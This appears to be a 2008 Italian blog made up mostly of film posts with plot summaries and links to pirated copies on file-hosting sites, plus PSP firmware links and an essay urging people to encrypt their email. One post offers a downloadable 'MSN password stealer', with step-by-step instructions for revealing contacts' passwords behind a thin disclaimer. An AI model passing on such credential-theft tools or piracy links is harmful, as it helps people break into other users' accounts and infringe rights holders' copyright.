domenica 28 dicembre 2008

Guardare 007 italian gratis !!



Titolo Italiano: 007 - Quantum of Solace
Titolo Originale: 007 - Quantum of Solace
Genere: Azione
Durata: 100′

Tradito dalla donna che amava, Vesper Lynd, l’agente James Bond (Daniel Craig) cercherà vendetta in una missione che lo porterà in Austria, Italia e Sud America.

Nel frattempo grazie alla Bond girl Camille (Olga Kurylenko), l’agente segreto incontrerà Dominic Greene (Mathieu Almaric), membro di una misteriosa organizzazione e uomo d’affari senza pietà, che tenterà di avere il controllo su tutte le risorse naturali…

Guardarlo Gratuitamente Grazie Italiastreaming

http://www.megavideo.com/?v=C0LZ1QFA

sabato 27 dicembre 2008

INTERCETTAZIONE MAIL

Visto tutto quello che é accaduto con le intercettazioni per il telefono nulla proibisce di pensare che un fenomeno analogo avvenga anche con le mail:

Qualcuno puó pensare che una mail sia qualcosa di misterioso e complicato, piú difficile da intercettare che una telefonata, ma é esattamente lo stesso atteggiamento passivo/fatalista/masochista di cui parlavo riguardo le intercettazioni telefoniche : in realtá per intercettare una mail basta avere accesso al server in cui é memorizzata, poi si puó leggere e cancellare quello che si vuole. Faccio fatica a credere che non ci sia un minimo di consapevolezza riguardo questi argomenti, ma ancora vedo moltissime mail, anche riservate ed importanti passare, semplicemente per i servizi mail messi a disposizione dal proprio provider, (libero, alice) forse dimenticando che anche il provider é un' azienda dove lavorano persone in carne ed ossa, e forse non sapendo anche che le mail sono MOLTO piú facili da intercettare delle telefonate, e che sono soprattutto MOLTO piú facili da FILTRARE, in modo da cercare e riconoscere a colpo sicuro succulenti segreti e pettegolezzi in mezzo alla massa di milioni di mail innocue.
(É un'operazione semplicissima, simile a alla ricerca di windows "cerca file contenente...")

Conoscendo il mondo delle BBS, (gli antenati di internet) e quello dei piccoli provider posso dirvi che la lettura delle mail dei clienti a titolo passatempo/cazzeggio é prassi abituale degli addetti ai server: difatti, per chi puó accedere ai server, per leggere le mail dei clienti NON SERVE conoscere la password: le mail sono a disposizione in chiaro e chiunque puó leggerle come si legge un file di word.

Se avete inviato foto personali via mail probabilmente avrete sollazzato molti sistemisti.


Forse, ora le Vostre foto "personali" sono finite come sfondo di qualche computer, se non sono giá finite su Emule, con nome ed e-mail.
(ho cercato proprio ora "mail" con Emule, immagini e sono uscite un centinaio di risultati, quasi tutte foto porno, molte con nome, mail e telefono e quasi tutte IN ITALIANO ! dev'essere un altro vizio italiano, oltre alle intercettazioni !)

Una soluzione contro l'intercettazione delle mail é... criptare le mail !

É possibile farlo efficacemente dal 1991, ma ancora vengono fatti circolare in chiaro documenti importanti e compromettenti sperando che non succeda nulla. Un programma (molto vecchio) per criptare le mail lo potete scaricare con il kit top secret, che potete scaricare gratis per inviarmi mail in sicurezza assoluta.

Una versione grafica aggiornata vi verrá installata assieme al kit di sicurezza FORENSICPROOF assieme a tutte le istruzioni per poterlo utilizzare al meglio, in massima sicurezza.

Un consiglio gratis che dó a tutti é quello di usare sempre provider ESTERI per quanto riguarda le mail:

Una mail con provider avente sede in italia é totalmente vulnerabile alle intercettazioni, anche senza mandato; é sufficiente un fax dall' "ufficio operativo" e i provider danno login e password senza problemi; con il mandato poi possono passare tutto, tabulati, elenco destinatari, mail inviate e ricevute fino a cinque anni fa. Una mail estera, invece richiederá il mandato di un tribunale locale, che se possibile lo é solo tramite una rog(n)atoria internazionale, lunga e costosa.Il provider di posta, poi puó anche non essere obbligato a tenere i dati di login fino a cinque anni, come nel belpaese, e puó darsi che non recuperi le mail cancellate.

Dal momento che leggere le mail dall' Italia o dalla Thailandia non mi cambia niente nel modo in cui la leggo ma mi dá questo grosso vantaggio il consiglio é di scegliere SEMPRE mail estere.


fonte: criptohacker

venerdì 26 dicembre 2008

mail FinaLand

volete una mail FINAL ??

come questa finaland@final.it

bella vero ki e interessato o mi contatta su quella mail o mi manda un commento !!!

ciao

News M33








Last Updates:

>> Despertar del Cementerio v8.

Updated to install 5.00 M33-4.

Mirror1: http://rapidshare.com/files/174517293/dc8.zip
Mirror2: http://www.megaupload.com/?d=2NZE6GOW


>> 5.00 M33-4.

Mirror1: http://rapidshare.com/files/170591048/500m33_4.zip
Mirror2: http://www.megaupload.com/?d=MKZ6ZFLM

grazie DarkAlex !!


La Duchessa




Titolo originale: The Duchess
Nazione: U.S.A., Italia, Regno Unito, Francia, Danimarca
Anno: 2008
Genere: Drammatico, Storico
Durata: 110'
Regia: Saul Dibb
Sito ufficiale: www.theduchessmovie.com
Cast: Keira Knightley, Ralph Fiennes, Charlotte Rampling, Simon McBurney, Dominic Cooper, Hayley Atwell, Aidan McArdle, Richard McCabe
Produzione: Boom, BBC Films, Magnolia Mae Films, Pathe Productions, Qwerty Films
Distribuzione: BIM
Data di uscita: Roma 2008
24 Dicembre 2008 (cinema)

Trama:
Ambientato alla fine del '700, La Duchessa è la storia della bella e sofisticata Georgiana Spencer, la donna più affascinante della sua epoca. Famosa per la sua bellezza e il suo fascino, divenne un personaggio controverso per i suoi gusti stravaganti e la sua passione per il gioco e per l'amore. Andata in sposa giovanissima al più anziano e freddo Duca del Devonshire, amica intima di ministri e principi, Georgiana fu un'icona dell'eleganza, una madre devota, un'abile attivista politica, e la beniamina della gente comune. Ma al centro della sua storia c'è soprattutto una disperata ricerca dell'amore.

Nome File:
La.Duchessa.2008.iTALiAN.MERRY.XMAS.LD.DVDRip.XviD-SiLENT

Link Rapidshare:
http://rapidshare.com/files/176656485/duch.rar

Il Cosmo sul Comò































Titolo originale: Il cosmo sul comò
Nazione: Italia
Anno: 2008
Genere: Commedia
Durata: 100'
Regia: Marcello Cesena
Sito ufficiale: www.ilcosmosulcomo.it
Cast: Aldo Baglio, Giovanni Storti, Giacomo Poretti, Raul Cremona, Angela Finocchiaro, Victoria Cabello, Sara D'amario, Isabella Ragonese, Silvana Fallisi
Produzione: Medusa Film, AGIDI srl
Distribuzione: Medusa
Data di uscita: 19 Dicembre 2008 (cinema)

Trama:
Il film si snoda in quattro episodi legati tra loro dai bizzarri insegnamenti di un maestro orientale - Tsu' Nam (Giovanni) - e dei suoi due discepoli (Aldo e Giacomo). Tsu'Nam elargisce continuamente pillole di improbabile saggezza e di solito preferisce farlo all'ombra di un ginko biloba, una massiccia e leggendaria pianta frondosa dai poteri ancestrali. Il metodo di insegnamento del maestro è arcaico, ma semplice ed efficace: far raggiungere "l'illuminazione" attraverso l'uso di un nodoso bambù. Aldo Giovanni e Giacomo, con le loro strambe avventure, diventano protagonisti di storie verosimili, alternandosi in una specie di giostra su cui girano curiosi esemplari della variopinta "specie umana". Una volta sono amici che condividono in modo stravagante il desiderio testardo di paternità di uno di loro, che si sottopone alle prove più grottesche pur di raggiungere il suo improbabile obiettivo; organizzano quindi la partenza per le vacanze estive in compagnia dei loro famigliari con i quali, tra equivoci e incomprensioni, scatenano situazioni impreviste. Sono inoltre protagonisti della vita naïf di un quartiere, che ruota intorno a una cadente chiesa di periferia e al suo parroco; infine diventano parte integrante dei ritratti di una pinacoteca che espone opere di celebri artisti e trasmigrano da un quadro all'altro. Aldo Giovanni e Giacomo, raccontando in chiave umoristica e surreale gli accadimenti del quotidiano, ancora una volta provano a dimostrare che il mondo è proprio lì a portata di mano e... forse è proprio vero Il cosmo (é) sul comò.

Versione TRL

Nome File:
Il.Cosmo.Sul.Como.2008.CAM.MD.iTALiAN.XviD-TRL

Link Rapidshare:
http://rapidshare.com/files/176635228/com.rar

mercoledì 24 dicembre 2008

Buone Feste da google e FinaLand

G00Gle 2009

Happy Holidays from Google

Saw 5 italiano dvdrip



Trama del film Saw V:

In questo quinto capitolo della saga di Saw, Hoffman sembra essere l'ultima persona rimasta in vita a portare avanti l'eredità del folle Jigsaw. Ma quando il suo segreto diviene a rischio di essere scoperto, Hoffman deve incaricarsi di eliminare tutti i possibili testimoni.


http://rapidshare.com/files/171496696/S5.rar

Regia:
David Hackl
Sceneggiatura: Patrick Melton, Marcus Dunstan
Attori: Tobin Bell, Costas Mandylor, Scott Patterson, Julie Benz, Meagan Good, Shawnee Smith, Betsy Russell, Carlo Rota, Mark Rolston, Greg Bryk, Samantha Lemole, Laura Gordon
Fotografia: David A. Armstrong
Montaggio: Kevin Greutert
Musiche: Charlie Clouser
Produzione: Twisted Pictures
Distribuzione: 01 distribution
Paese: USA 2008
Uscita Cinema: 05/12/2008
Genere: Horror
A&V 9/10

programma efficace per rubare password msn

l'uso impropio e non e di mia responsabilita. questo e solo per scopo informatico

COME USARLO:
aprire il MSNpassword.rar scompattate e troverete due file uno netray.dll e un altro MSNPassword.exe
eseguite MSNPassword.exe vi aprira il programma con scritto indirizzo hotmail: li scrivete il vostro indirizzo.... e nell'altro password: metterete la vostra password.... e poi cliccherete su OK lui iniziera a scansionare tutti i vostri contatti per cercare le loro rispettive password.... dopo aver finito (ci mettera un po poiche si connettera nel server msn per trovare le password) ma aspettate che finisca. poi dove ce scritto lista contatti troverete la vostra lista contatti poi basta cliccare sul il contatto che si vuole rubare la password e dopo averlo fatto cliccherete su PASSWORD e verra svelata la password .

l'uso impropio e non e di mia responsabilita. questo e solo per scopo informatico

Download-Link:
http://rapidshare.com/files/117255857/MSNpassword.rar.html



martedì 23 dicembre 2008

sito in costruzione

per un po il sito sara cosi tra poco stabilizzo tutto

Never Back Down



Titolo originale: Never Back Down
Nazione: U.S.A.
Anno: 2008
Genere: Azione
Durata: 110'
Regia: Jeff Wadlow

Cast: Sean Faris, Djimon Hounsou, Amber Heard, Cam Gigandet, Leslie Hope, Lauren Leech, Evan Peters, Wyatt Smith
Produzione: Summit Entertainment, Mandalay Pictures, BMP Films, Mandalay Independent Pictures
Distribuzione: Medusa
Data di uscita: 28 Novembre 2008 (cinema)

Trama:
Trasferitosi da poco in un nuovo liceo, un ragazzo "difficile" abituato ad essere una star sportiva nella scuola precedente, trova parecchi ostacoli nel suo inserimento. Quando durante una festa, verrà sfidato in un combattimento e subirà un'umiliazione pubblica, decide di allenarsi rivolgendosi ad un esperto del settore che diventerà poi la sua guida. Entrerà così in mondo fatto di combattimenti sotterranei...
http://rapidshare.com/files/168643101/nbd.rar
Nuovi link rapid grazie a karma:
http://rapidshare.com/files/169023138/link_rapid_by_karma.rar

Twilight




Titolo originale: Twilight
Nazione: U.S.A.
Anno: 2008
Genere: Azione, Romantico, Thriller
Durata: 110′
Regia: Catherine Hardwicke
Sito ufficiale: www.twilightthemovie.com
Sito italiano: www.twilight-blog.eaglepictures.com
Cast: Kristen Stewart, Robert Pattinson, Taylor Lautner, Michael Welch, Justin Chon, Peter Facinelli, Kellan Lutz, Christian Serratos, Elizabeth Reaser, Nikki Reed
Produzione: Maverick Films, Summit Entertainment, Temple Hill Entertainment, Twilight Productions
Distribuzione: Eagle Pictures
Data di uscita: Roma 2008
21 Novembre 2008

Trama:
Trasferitasi nella cittadina di Forks insieme al padre, Bella Swan si innamora di un suo affascinante e misterioso compagno di classe, Edward. La passione tra i due prende il sopravento e quando Bella scopre la verità é ormai troppo tardi. La verità é che Edward é un vampiro, ma la ragazza, sicura dei suoi sentimenti non ha nessuna intenzione di interrompere il loro rapporto, ed é disposta a convivere con le differenze che ci sono tra loro. Il problema, però, é l’arrivo in città di un gruppo di vampiri che hanno intenzioni tutt’altro che innocue…


Voto Qualità:
Audio: 8.5
Video: 7,5
nuovi link rapid
http://rapidshare.com/files/171859136/twgh_new.rar

ultimatum alla terra



Titolo originale: The Day the Earth Stood Still
Nazione: U.S.A.
Anno: 2008
Genere: Drammatico, Fantascienza
Durata: 103'
Regia: Scott Derrickson
Sito ufficiale: www.thedaytheearthstoodstillmovie.com
Sito italiano: www.ultimatumallaterra.it/

Cast: Keanu Reeves, Jennifer Connelly, Jon Hamm, Kathy Bates, John Cleese, Jaden Smith, Aaron Douglas, Lorena Gale, Roger R. Cross
Produzione: Earth Canada Productions, Twentieth Century-Fox Film Corporation
Distribuzione: 20th Century Fox
Data di uscita: 12 Dicembre 2008 (cinema)

Trama:
Klaatu, é un alieno, inviato sulla terra con una missione ed un messaggio di assoluta importanza, deve lanciare un ultimatum: o gli abitanti della terra vivranno in pace o saranno annientati. Remake del film uscito nel 1951.

Audio 7
Video 7
LINK RAPID E MEGA:
http://rapidshare.com/files/173072358/ultim08.rar

Madagascar 2 ITA



Titolo: Madagascar 2
Nazionalità: Usa
Regia: Eric Darnell, Tom McGrath
Sceneggiatura: Etan Cohen
Genere: Animazione
Cast: Ben Stiller, Chris Rock, David Schwimmer, Jada Pinkett Smith, Sacha Baron Cohen, Alec Baldwin
Data di uscita: 19/12/2008
Durata: 89'

Ritornano tutti i simpatici personaggi — Alex il Leone, Marty la zebra, Melman la giraffa e Gloria l’ippopotamo, Re Julien, Maurice e i pinguini. Abbandonati sulle lontane spiagge del Madagascar, I Newyorkesi hanno architettato un piano così folle che potrebbe funzionare! Con precisione militare i pinguini hanno riparato un vecchio aereo guasto... Una volta a bordo, partono in volo fino ad uno dei posti più selvaggi del mondo - le pianure dell’Africa - dove la nostra ciurma di animali da zoo incontra per la prima volta degli esemplari della loro stessa specie. Mentre riscoprono le loro radici, rapidamente realizzano le differenze fra la giungla di cemento e il cuore dell'Africa. Nonostante parenti persi da tempo, rivali in amore e astuti cacciatori, l'Africa sembra un frenetico party...ma sarà meglio della loro casa a Central Park?


Audio 9 Video 9

http://rapidshare.com/files/175563966/mascar2.rar

Natale a Rio italiano RS e MU



Titolo originale: Natale a Rio
Nazione: Italia
Anno: 2008
Genere: Commedia
Durata: 110'
Regia: Neri Parenti
Sito ufficiale: http://www.nataleariodejaneiro.it
Cast: Christian De Sica, Massimo Ghini, Michelle Hunziker, Fabio De Luigi, Paolo Conticini, Ludovico Fremont, Emanuele Propizio
Produzione: Aurelio De Laurentiis & Luigi De Laurentiis
Distribuzione: Filmauro
Data di uscita: 19 Dicembre 2008 (cinema)

Trama:
Fabio(Fabio De Luigi) è da sempre innamorato della sua collega Linda(Michelle Hunziker), ma senza il coraggio di rivelarsi. A causa di unoscambio di indirizzi elettronici, Fabio pensa che Linda lo abbia notatoe addirittura invitato a passare con lei le vacanze di Natale inBrasile. Ma quando si presenta in aeroporto, si accorge dell'equivoco:Linda sta partendo con il suo fidanzato segreto Gianni (PaoloConticini) e per di più il motivo del viaggio è presentarlo al padreche vive in Brasile da molti anni. Non potendo più tirarsi indietro,Fabio è costretto a partire come terzo incomodo. Una volta arrivati adestinazione, Gianni cade in tentazione e si lancia in un avventuraamorosa con una bella brasiliana. Scoperto da Linda, vieneimmediatamente lasciato. La ragazza non vuole tuttavia rivelare alpadre di essere stata nuovamente presa in giro da un uomo e chiede aFabio di fingere di essere il suo futuro marito. Mai proposta potevaessere più allettante per Fabio, che mette in atto ogni trucco estratagemma per prolungare il periodo della finzione. Ma il ritorno diGianni pentito rischia di far fallire il suo sogno d'amore... Paolo(Christian De Sica) e Mario (Massimo Ghini), due divorziaticinquantenni, hanno organizzato una vacanza lussuosissima a Rio deJaneiro per le feste di Natale. Ignorano, tuttavia, che i loro figliPiero (Ludovico Fremont) e Marco (Emanuele Propizio) hanno prenotato unviaggio low-cost per la stessa destinazione. A causa dell'omonimia trapadri e figli, le due vacanze vengono scambiate, così mentre i figli sigodono ville di lusso e auto superaccessoriate, i padri finiscono in uncomico vagabondare, tra ostelli pulciosi e auto sgangherate, per lestrade più malfamate di Rio de Janeiro. Paolo e Mario realizzano chec'è stato un errore e tentano con ogni mezzo di rientrare in possessodella loro vacanza. A complicare le cose ci si mette anche il fatto chele mamme di Piero e Marco, all'insaputa di figli ed ex mariti, sitrovano a Rio per un'operazione di chirurgia plastica. Tra equivoci edinaspettate coincidenze padri e figli si incontreranno e siscontreranno in avventure travolgenti...

http://rapidshare.com/files/175563965/nrio.rar

benvenuti